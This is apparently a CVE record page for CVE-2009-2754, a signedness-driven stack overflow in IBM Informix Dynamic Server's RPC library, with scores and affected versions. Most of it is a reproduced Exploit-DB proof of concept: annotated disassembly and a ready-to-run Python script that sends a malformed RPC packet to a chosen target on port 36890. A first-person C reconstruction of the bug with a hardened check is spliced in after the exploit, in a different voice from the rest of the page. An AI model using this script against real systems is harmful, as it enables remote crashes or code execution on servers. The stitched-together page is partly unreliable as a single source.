Related Weaknesses

| CWE-ID | Weakness Name | Source |
|---|---|---|
| CWE-119 | Improper Restriction of Operations within the Bounds of a Memory Buffer: The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. | |
Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 12109
Publication date : 2010-04-07 22h00 +00:00
Author : ZSploit.com
EDB Verified : Yes
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754
#! /usr/bin/env python
###############################################################################
## File : zs_ids_rpc.py
## Description:
## :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():
.text:1000B8E1 mov [ebp+0], eax
.text:1000B8E4 mov eax, [ebx]
.text:1000B8E6 push eax ; netlong
.text:1000B8E7 add ebx, 4
.text:1000B8EA call esi ; ntohl ; Get length of hostname
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1 jle short loc_1000B8FD
.text:1000B8F3 mov esi, 1
.text:1000B8F8 jmp loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD mov edi, [ebp+4]
.text:1000B900 mov ecx, eax
.text:1000B902 mov edx, ecx
.text:1000B904 mov esi, ebx
.text:1000B906 shr ecx, 2
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B mov ecx, edx
.text:1000B90D add eax, 3
.text:1000B910 and ecx, 3
.text:1000B913 rep movsb
"""
import sys
import socket

if len(sys.argv) != 2:
    print("Usage:\t%s [target]" % sys.argv[0])
    sys.exit(0)

# RPC record whose AUTH_UNIX credential carries a hostname length field
# of 0xffffffff, the -1 that passes the signed "cmp eax, 0FFh" above.
data = b"\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
       b"\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
       b"\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
       b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
       b"\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
       b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       b"\x00\x00\x00\x00\x00\x00\x00\x00"

host = sys.argv[1]
port = 36890

print("PoC for ZDI-10-023 by ZSploit.com")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.send(data)
        print("Sending payload ..")
    except socket.error:
        print("Error in send")
    print("Done")
except socket.error:
    print("Error in socket")
The ZSploit Team
http://zsploit.com
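The signedness bug annotated in the disassembly above, reduced to C as an added example (not code from the page, from ZSploit, or from the affected product; the function names, MAX_MACHNAME and the sample messages are my own reconstruction of the disassembled logic): the signed compare that lets 0xffffffff through, beside an unsigned check that also bounds the length by the bytes left in the message.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hostname length cap taken from the listing's "cmp eax, 0FFh". */
#define MAX_MACHNAME 255

/* Big-endian 32-bit read, i.e. what ntohl() yields for the wire value. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Vulnerable pattern (hypothetical C model of the disassembly): the length
 * lands in a signed int and the compare is a signed jle, so 0xffffffff
 * reads as -1, passes, and reaches the copy as an unsigned size.
 * Returns that copy size, or -1 if the check rejects the length. */
static int64_t hostname_len_signed(const uint8_t *buf) {
    int32_t len = (int32_t)be32(buf);      /* sign bit reinterpreted */
    if (len > MAX_MACHNAME)
        return -1;
    return (int64_t)(uint32_t)len;         /* rep movsd sees 4294967295 */
}

/* Hardened check: unsigned compare against the cap AND against the
 * bytes actually left in the message after the 4-byte length field. */
static int64_t hostname_len_unsigned(const uint8_t *buf, size_t avail) {
    if (avail < 4)
        return -1;
    uint32_t len = be32(buf);
    if (len > MAX_MACHNAME || len > avail - 4)
        return -1;
    return (int64_t)len;
}

/* Copy the hostname into a fixed-size buffer using the hardened check.
 * Returns the hostname length, or -1 if the message was rejected. */
static int64_t copy_hostname(const uint8_t *buf, size_t avail,
                             char out[MAX_MACHNAME + 1]) {
    int64_t len = hostname_len_unsigned(buf, avail);
    if (len < 0)
        return -1;
    memcpy(out, buf + 4, (size_t)len);
    out[len] = '\0';
    return len;
}

/* Constructed samples: a 4-byte hostname, and the 0xffffffff length
 * field the PoC above sends, followed by filler bytes. */
static const uint8_t GOOD[] = {0, 0, 0, 4, 'h', 'o', 's', 't', 0, 0, 0, 0};
static const uint8_t BAD[] = {0xff, 0xff, 0xff, 0xff, 'A', 'A', 'A', 'A'};
```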
Products Mentioned
Configuration 0
Ibm>>Informix_dynamic_server >> Version 10.0
Ibm>>Informix_dynamic_server >> Version 10.0.tc1
Ibm>>Informix_dynamic_server >> Version 10.0.xc1
Ibm>>Informix_dynamic_server >> Version 10.0.xc2e
Ibm>>Informix_dynamic_server >> Version 10.0.xc3
Ibm>>Informix_dynamic_server >> Version 10.0.xc3e
Ibm>>Informix_dynamic_server >> Version 10.0.xc4
Ibm>>Informix_dynamic_server >> Version 10.0.xc4e
Ibm>>Informix_dynamic_server >> Version 10.0.xc5
Ibm>>Informix_dynamic_server >> Version 10.0.xc5e
Ibm>>Informix_dynamic_server >> Version 10.0.xc6
Ibm>>Informix_dynamic_server >> Version 10.0.xc6e
Ibm>>Informix_dynamic_server >> Version 10.0.xc7
Ibm>>Informix_dynamic_server >> Version 10.0.xc7e
Ibm>>Informix_dynamic_server >> Version 10.0.xc8
Ibm>>Informix_dynamic_server >> Version 10.0.xc8e
Ibm>>Informix_dynamic_server >> Version 10.0.xc9
Ibm>>Informix_dynamic_server >> Version 10.0.xc9e
Ibm>>Informix_dynamic_server >> Version 10.0.xc10
Ibm>>Informix_dynamic_server >> Version 10.0.xc10e
Ibm>>Informix_dynamic_server >> Version 11.1
Ibm>>Informix_dynamic_server >> Version 11.10
Ibm>>Informix_dynamic_server >> Version 11.10.xc1
Ibm>>Informix_dynamic_server >> Version 11.10.xc1de
Ibm>>Informix_dynamic_server >> Version 11.10.xc2
Ibm>>Informix_dynamic_server >> Version 11.10.xc2e
Ibm>>Informix_dynamic_server >> Version 11.10.xc3
Ibm>>Informix_dynamic_server >> Version 11.10.xc3e
References